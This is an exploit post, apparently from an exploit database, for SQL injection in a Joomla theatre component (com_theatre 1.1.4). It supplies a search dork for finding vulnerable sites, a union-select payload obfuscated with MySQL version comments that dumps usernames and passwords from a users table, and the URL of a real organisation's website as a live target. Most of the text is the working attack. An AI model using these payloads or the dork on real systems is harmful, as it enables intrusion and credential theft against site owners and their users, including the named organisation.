######################
# Exploit Title :  Joomla com_threate 1.1.4 SQL injection
# Exploit Author : xBADGIRL21
# Dork : index.php?option=com_threate
# version: 1.1.4
# Vendor Homepage : http://joomlic.com/
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/09
# video Proof : https://youtu.be/WXqrK7dqGaY
######################
# PoC:
# [id=]  Get Parameter Vulnerable To SQL
#
# http://server/index.php?option=com_theatre&view=show&id=[SQLi]
#
# Demo
# http://server/index.php?option=com_theatre&view=show&id=36'
#
# http://server/index.php?option=com_theatre&view=show&id=-36
 /*!12345union*/ select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
#
# http://server/index.php?option=com_theatre&view=show&id=-36
 /*!12345union*/ select
1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
from aur_users--
#
# Live Demo :
# https://www.auroratheatre.org/
#
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################